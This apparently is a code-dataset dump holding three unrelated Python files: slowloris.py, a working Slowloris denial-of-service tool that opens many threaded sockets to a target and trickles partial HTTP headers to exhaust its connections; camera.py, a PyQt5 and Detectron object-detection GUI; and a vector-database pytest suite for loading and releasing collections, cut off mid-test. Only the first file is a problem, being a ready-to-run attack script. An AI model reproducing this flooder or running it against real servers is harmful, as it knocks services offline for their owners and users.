source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
slowloris.py | import random
import time
import socket
from threading import Thread
# Import modules for SLOWLORIS flood
import tools.randomData as randomData
def SLOWLORIS_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("[#] Attack started for " + str(attack_time) + " seconds..")
threads_list = []
# SLOWLORIS flood
def slowloris_flood():
global FINISH
# Init socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(4)
sock.connect((target_ip, target_port))
sock.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
sock.send("User-Agent: {}\r\n".format(randomData.random_useragent()).encode("utf-8"))
sock.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
while not FINISH:
if not FINISH:
# Packet
try:
sock.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
except socket.error:
print("[-] Failed..")
else:
print("[+] Sending to " + target)
# Start threads
for thread in range(0, threads):
print("[#] Starting thread " + str(thread))
t = Thread(target = slowloris_flood)
t.start()
threads_list.append(t)
# Sleep selected seconds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("[!] SLOWLORIS attack stopped!")
|
camera.py | #!/usr/bin/python2
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'camara_ui.ui'
#
# Created by: PyQt5 UI code generator 5.5.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
import sys
import cv2
import numpy as np
import threading
import time
import Queue
running = False
capture_thread = None
q = Queue.Queue(maxsize=10)
from collections import defaultdict
import argparse
import glob
import logging
import os
import math
reload(sys)
sys.setdefaultencoding('utf-8')
sys.path.append('/home/vpa/github/caffe2/build')
sys.path.append('/home/vpa/github/cocoapi/PythonAPI')
from caffe2.python import workspace
from PIL import Image, ImageDraw, ImageFont
from core.config import assert_and_infer_cfg
from core.config import cfg
from core.config import merge_cfg_from_file
from utils.timer import Timer
import core.test_engine as infer_engine
import datasets.dummy_datasets as dummy_datasets
import utils.c2 as c2_utils
c2_utils.import_detectron_ops()
# OpenCL may be enabled by default in OpenCV3; disable it because it's not
# thread safe and causes unwanted GPU memory allocations.
cv2.ocl.setUseOpenCL(False)
_GRAY = (218, 227, 218)
_GREEN = (18, 127, 15)
_WHITE = (255, 255, 255)
def parse_args():
parser = argparse.ArgumentParser(description='End-to-end inference')
parser.add_argument(
'--cfg',
dest='cfg',
help='cfg model file (/path/to/model_config.yaml)',
default='/home/vpa/github/Detectron/configs/12_2017_baselines/e2e_faster_rcnn_R-50-FPN_2x.yaml',
type=str
)
parser.add_argument(
'--wts',
dest='weights',
help='weights model file (/path/to/model_weights.pkl)',
default='/home/vpa/models/detectron/e2e_faster_rcnn_R-50-FPN_2x.pkl',
type=str
)
# if len(sys.argv) == 1:
# parser.print_help()
# sys.exit(1)
return parser.parse_args()
def get_class_string(class_index, score, class_names):
class_text = class_names[class_index] if class_names is not None else \
'id{:d}'.format(class_index)
# return class_text + ' {:0.2f}'.format(score).lstrip('0')
return class_text
def vis_class(img, pos, class_str, theta, radius, font_scale=0.35):
"""Visualizes the class."""
x0, y0 = int(pos[0]), int(pos[1])
# if theta > 0:
# thetaText = u' 右前方%d度'%math.fabs(theta)
# elif theta ==0:
# thetaText = u' 正前方' % math.fabs(theta)
# else:
# thetaText = u' 左前方%d度' % math.fabs(theta)
thetaText = u'%d度'%(90-theta)
distText=u'%.2f米'%radius
txt = class_str+thetaText+distText
# cv2 to pil
cv2_im = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # cv2和PIL中颜色的hex码的储存顺序不同
pil_im = Image.fromarray(cv2_im)
# draw pil
draw = ImageDraw.Draw(pil_im) # 括号中为需要打印的canvas,这里就是在图片上直接打印
font = ImageFont.truetype("/usr/share/fonts/truetype/simhei.ttf", 15, encoding="utf-8") # 第一个参数为字体文件路径,第二个为字体大小
draw.text((x0, y0-15), txt, (0, 0, 0), font=font) # 第一个参数为打印的坐标,第二个为打印的文本,第三个为字体颜色,第四个为字体
# pil to cv2
img = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
#cv2.imshow("detect", img)
# Compute text size.
# txt = class_str
# font = cv2.FONT_HERSHEY_SIMPLEX
# ((txt_w, txt_h), _) = cv2.getTextSize(txt, font, font_scale, 1)
# Place text background.
# back_tl = x0, y0 - int(1.3 * txt_h)
# back_br = x0 + txt_w, y0
# cv2.rectangle(img, back_tl, back_br, _GREEN, -1)
# Show text.
# txt_tl = x0, y0 - int(0.3 * txt_h)
# cv2.putText(img, txt, txt_tl, font, font_scale, _GRAY, lineType=cv2.LINE_AA)
return img
def vis_bbox(img, bbox, thick=1, color=_GREEN):
"""Visualizes a bounding box."""
(x0, y0, w, h) = bbox
x1, y1 = int(x0 + w), int(y0 + h)
x0, y0 = int(x0), int(y0)
cv2.rectangle(img, (x0, y0), (x1, y1), color, thickness=thick)
return img
def computeaspect(bbox):
"""compute distance and aspect of the object ."""
u, v = (bbox[0] + bbox[2]) / 2.0, bbox[3]
x = 0.0230 * u - ((0.9996 * u - 550.3179) * (37.6942 * v - 2.2244e+06)) / (
1.6394e+03 * v - 4.1343e+05) - 12.9168
y = ((0.0070 * u - 1.6439e+03) * (37.6942 * v - 2.2244e+06)) / (
1.6394e+03 * v - 4.1343e+05) - 1.6046e-04 * u + 0.0902
theta = math.degrees(math.atan2(y, x))
radius = math.sqrt(x ** 2 + y ** 2)/1000
return theta, radius
def demo_vis_one_imageboxes_opencv(im, cls_boxes, thresh=[], show_box=False,dataset=None, show_class=False,
class_names=[], color_list=[], cls_sel=[],queue=[],frame=[],count=0,start_time=[]):
"""Constructs a numpy array with the detections visualized."""
box_list = [b for b in [cls_boxes[i] for i in cls_sel] if len(b) > 0]
if len(box_list) > 0:
boxes = np.concatenate(box_list)
else:
boxes = None
classes = []
# for j in range(len(cls_boxes)):
for j in cls_sel:
# print(len(cls_boxes[j]))
classes += [j] * len(cls_boxes[j])
if boxes is None or boxes.shape[0] == 0 or max(boxes[:, 4]) < min(thresh):
return im
# for i in sorted_inds:
for i, cls_id in enumerate(classes[0:]):
bbox = boxes[i, :4]
score = boxes[i, -1]
if score < thresh[cls_id]:
continue
theta, radius = computeaspect(bbox)
# show box (off by default)
if show_box:
im = vis_bbox(
im, (bbox[0], bbox[1], bbox[2] - bbox[0], bbox[3] - bbox[1]), color=color_list[cls_id])
# show class (off by default)
if show_class:
class_str = get_class_string(classes[i], score, class_names)
im = vis_class(im, (bbox[0], bbox[1], bbox[2], bbox[3]), class_str, theta, radius)
avg_fps = (count-4) / (time.time() - start_time)
cv2.putText(im, '{:s} {:.1f}/s'.format('fps', avg_fps), (40, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255),
lineType=cv2.LINE_AA)
frame["img"] = im
# if queue.qsize() < 10:
# queue.put(frame)
# else:
# return
# break
return frame
def camera(cam, queue, width, height, fps, args):
global running
logger = logging.getLogger(__name__)
merge_cfg_from_file(args.cfg)
cfg.TEST.WEIGHTS = args.weights
cfg.NUM_GPUS = 1
assert_and_infer_cfg()
model = infer_engine.initialize_model_from_cfg()
dummy_coco_dataset = dummy_datasets.get_coco_dataset()
start_time = 0
count = 0
# class_names =[
# '__background__', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
# 'bus', 'train', 'truck']
# color_list=[[0,0,0],[255,0,0],[0,255,0],[0,0,255],[255,255,0],[0,255,255],[255,255,0],[255,0,255],[255,255,255]]
class_names = [
'__background__', u'人', u'自行车', u'车', u'摩托车', 'airplane',
u'车', 'train', u'车']
color_list = [[0, 0, 0], [255, 0, 0], [0, 255, 0], [0, 0, 255], [255, 255, 0], [0, 0, 255], [255, 255, 0],
[255, 0, 255], [0, 0, 255]]
cls_sel = [1, 2, 3, 4, 6, 8]
cls_thresh = [1, 0.6, 0.5, 0.8, 0.5, 0.9, 0.7, 0.9, 0.5]
if count == 0:
logger.info(
' \ Note: inference on the first image will be slower than the '
'rest (caches and auto-tuning need to warm up)'
)
capture = cv2.VideoCapture(cam)
capture.set(cv2.CAP_PROP_FRAME_WIDTH, width)
capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
# capture.set(cv2.CAP_PROP_FPS, fps)
# size = (int(capture.get(cv2.CAP_PROP_FRAME_WIDTH)), int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT)))
#print(cv2.__version__)
while (running):
frame = {}
ret, im = capture.read()
count = count + 1
if count==5:
start_time=time.time()
# timers = defaultdict(Timer)
# # detect one image
with c2_utils.NamedCudaScope(0):
cls_boxes, _, _ = infer_engine.im_detect_all(
model, im, None, timers=None)
demo_vis_one_imageboxes_opencv(im, cls_boxes, thresh=cls_thresh, show_box=True, dataset=dummy_coco_dataset,
show_class=True, class_names=class_names, color_list=color_list, cls_sel=cls_sel,
queue=q,frame=frame,count=count,start_time=start_time)
queue.put(frame)
# frame["img"] = im
# if queue.qsize() < 20:
# queue.put(frame)
# else:
# break
# print(queue.qsize())
# if queue.qsize() >= 10:
# break
# print(queue.qsize())
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
class OwnImageWidget(QtWidgets.QWidget):
def __init__(self, parent=None):
super(OwnImageWidget, self).__init__(parent)
self.image = None
def setImage(self, image):
self.image = image
sz = image.size()
self.setMinimumSize(sz)
self.update()
def paintEvent(self, event):
qp = QtGui.QPainter()
qp.begin(self)
if self.image:
qp.drawImage(QtCore.QPoint(0, 0), self.image)
qp.end()
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(2560, 1440)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayoutWidget = QtWidgets.QWidget(self.centralwidget)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(170, 160, 2000, 1200))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setObjectName("verticalLayout")
self.startButton = QtWidgets.QPushButton(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(15)
self.startButton.setFont(font)
self.startButton.setObjectName("startButton")
self.verticalLayout.addWidget(self.startButton)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(0, 0, 180, 180))
self.label.setObjectName("logo")
jpg = QtGui.QPixmap('/home/vpa/github/Detectron_jdy/tools/logo2.jpg')
self.label.setPixmap(jpg)
MainWindow.setCentralWidget(self.centralwidget)
self.groupBox = QtWidgets.QGroupBox(self.verticalLayoutWidget)
self.groupBox.setObjectName("groupBox")
self.widget = QtWidgets.QWidget(self.groupBox)
self.widget.setGeometry(QtCore.QRect(10, 10, 2000, 1200))
self.widget.setObjectName("widget")
self.verticalLayout.addWidget(self.groupBox)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 789, 25))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(700, 60, 1000, 91))
font = QtGui.QFont()
font.setPointSize(25)
self.label.setFont(font)
self.label.setObjectName("label")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.startButton.clicked.connect(self.start_clicked)
self.window_width = self.widget.frameSize().width()
self.window_height = self.widget.frameSize().height()
self.ImgWidget = OwnImageWidget(self.widget)
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.update_frame)
self.timer.start(1)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "目标检测系统"))
self.startButton.setText(_translate("MainWindow", "开始检测"))
self.groupBox.setTitle(_translate("MainWindow", ""))
self.label.setText(_translate("MainWindow", "天津大学视觉模式分析实验室目标检测系统"))
def start_clicked(self):
global running
running = True
capture_thread.start()
self.startButton.setEnabled(False)
self.startButton.setText('准备检测')
def update_frame(self):
if not q.empty():
self.startButton.setText('正在检测')
frame = q.get()
img = frame["img"]
img_height, img_width, img_colors = img.shape
scale_w = float(self.window_width) / float(img_width)
scale_h = float(self.window_height) / float(img_height)
scale = min([scale_w, scale_h])
if scale == 0:
scale = 1
img = cv2.resize(img, None, fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
height, width, bpc = img.shape
bpl = bpc * width
image = QtGui.QImage(img.data, width, height, bpl, QtGui.QImage.Format_RGB888)
self.ImgWidget.setImage(image)
def closeEvent(self, event):
global running
running = False
if __name__ == "__main__":
import sys
capture_thread = threading.Thread(target=camera, args=(0, q, 1000, 800, 30, parse_args()))
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
test_load_collection.py | import pdb
import pytest
from utils import *
from constants import *
uid = "load_collection"
field_name = default_float_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": default_top_k, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
class TestLoadCollection:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_after_index(self, connect, collection, get_simple_index):
'''
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
'''
connect.insert(collection, default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.level(2)
def test_load_collection_after_index_binary(self, connect, binary_collection, get_binary_index):
'''
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
'''
ids = connect.insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
get_binary_index["metric_type"] = metric_type
connect.drop_index(binary_collection, default_binary_vec_field_name)
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, default_binary_vec_field_name)
assert index == get_binary_index
connect.load_collection(binary_collection)
connect.release_collection(binary_collection)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_empty_collection(self, connect, collection):
'''
target: test load collection
method: no entities in collection, load collection with correct params
expected: load success
'''
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.level(2)
def test_load_collection_dis_connect(self, dis_connect, collection):
'''
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.load_collection(collection)
@pytest.mark.level(2)
def test_release_collection_dis_connect(self, dis_connect, collection):
'''
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.release_collection(collection)
@pytest.mark.level(2)
def test_load_collection_not_existed(self, connect, collection):
collection_name = gen_unique_str(uid)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.level(2)
def test_release_collection_not_existed(self, connect, collection):
collection_name = gen_unique_str(uid)
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_not_load(self, connect, collection):
"""
target: test release collection without load
method:
expected: raise exception
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_after_load_release(self, connect, collection):
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_collection(collection)
connect.load_collection(collection)
def test_load_collection_repeatedly(self, connect, collection):
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.load_collection(collection)
@pytest.mark.level(2)
def test_load_release_collection(self, connect, collection):
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.insert(collection_name, default_entities)
connect.flush([collection_name])
connect.load_collection(collection_name)
connect.release_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.drop_collection(collection)
try:
connect.release_collection(collection)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_without_flush(self, connect, collection):
"""
target: test load collection without flush
method: insert entities without flush, then load collection
expected: load collection failed
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.load_collection(collection)
# TODO
def _test_load_collection_larger_than_memory(self):
"""
target: test load collection when memory less than collection size
method: i don't know
expected: raise exception
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_release_part_partitions(self, connect, collection):
"""
target: test release part partitions after load collection
method: load collection and release part partitions
expected: released partitions search empty
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
connect.search(collection, default_single_query, partition_names=[default_tag])
res = connect.search(collection, default_single_query, partition_names=[default_partition_name])
assert len(res[0]) == default_top_k
def test_load_collection_release_all_partitions(self, connect, collection):
"""
target: test release all partitions after load collection
method: load collection and release all partitions
expected: search empty
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_partition_name, default_tag])
with pytest.raises(Exception) as e:
connect.search(collection, default_single_query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partitions_release_collection(self, connect, collection):
"""
target: test release collection after load partitions
method: insert entities into partitions, search empty after load partitions and release collection
expected: search result empty
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
# assert len(res[0]) == 0
class TestReleaseAdvanced:
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_during_searching(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into collection, flush and load collection, release collection during searching
expected:
"""
nq = 1000
top_k = 1
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
query, _ = gen_query_vectors(field_name, default_entities, top_k, nq)
future = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def test_release_partition_during_searching(self, connect, collection):
"""
target: test release partition during searching
method: insert entities into partition, flush and load partition, release partition during searching
expected:
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, default_entities, top_k, nq)
connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception):
res = connect.search(collection, default_single_query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_during_searching_A(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into partition, flush and load partition, release collection during searching
expected:
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, default_entities, top_k, nq)
connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_collection_during_loading(self, connect, collection):
"""
target: test release collection during loading
method: insert entities into collection, flush, release collection during loading
expected:
"""
connect.insert(collection, default_entities)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_partition_during_loading(self, connect, collection):
"""
target: test release partition during loading
method: insert entities into partition, flush, release partition during loading
expected:
"""
connect.create_partition(collection, default_tag)
connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
def _test_release_collection_during_inserting(self, connect, collection):
"""
target: test release collection during inserting
method: load collection, do release collection during inserting
expected:
"""
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
def insert():
connect.insert(collection, default_entities)
t = threading.Thread(target=insert, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
res = connect.search(collection, default_single_query)
# assert len(res[0]) == 0
def _test_release_collection_during_indexing(self, connect, collection):
"""
target: test release collection during building index
method: insert and flush, load collection, do release collection during creating index
expected:
"""
pass
def _test_release_collection_during_droping_index(self, connect, collection):
"""
target: test release collection during droping index
method: insert, create index and flush, load collection, do release collection during droping index
expected:
"""
pass
class TestLoadCollectionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_load_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.load_collection(collection_name)
@pytest.mark.level(2)
def test_release_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.release_collection(collection_name)
class TestLoadPartition:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in cpu mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partition_after_index(self, connect, collection, get_simple_index):
'''
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
'''
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
search_param = get_search_param(get_simple_index["index_type"])
query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq=1, search_params=search_param)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, partition_names=[default_tag])
assert len(res[0]) == default_top_k
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partition_after_index_binary(self, connect, binary_collection, get_binary_index):
'''
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
'''
connect.create_partition(binary_collection, default_tag)
ids = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
logging.getLogger().info(metric_type)
get_binary_index["metric_type"] = metric_type
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
connect.load_partitions(binary_collection, [default_tag])
@pytest.mark.skip("xige-16-search-without-insert")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_empty_partition(self, connect, collection):
'''
target: test load collection
method: no entities in collection, load collection with correct params
expected: load success
'''
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_load_collection_dis_connect(self, connect, dis_connect, collection):
'''
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
'''
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
dis_connect.load_partitions(collection, [default_tag])
@pytest.mark.level(2)
def test_release_partition_dis_connect(self, connect, dis_connect, collection):
'''
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
'''
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
dis_connect.release_partitions(collection, [default_tag])
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partition_not_existed(self, connect, collection):
partition_name = gen_unique_str(uid)
try:
connect.load_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_partition_not_existed(self, connect, collection):
partition_name = gen_unique_str(uid)
try:
connect.release_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_partition_not_load(self, connect, collection):
"""
target: test release collection without load
method:
expected: raise exception
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.release_partitions(collection, [default_tag])
@pytest.mark.level(2)
def test_load_release_after_drop(self, connect, collection):
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_partition_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_release_after_collection_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_collection(collection)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
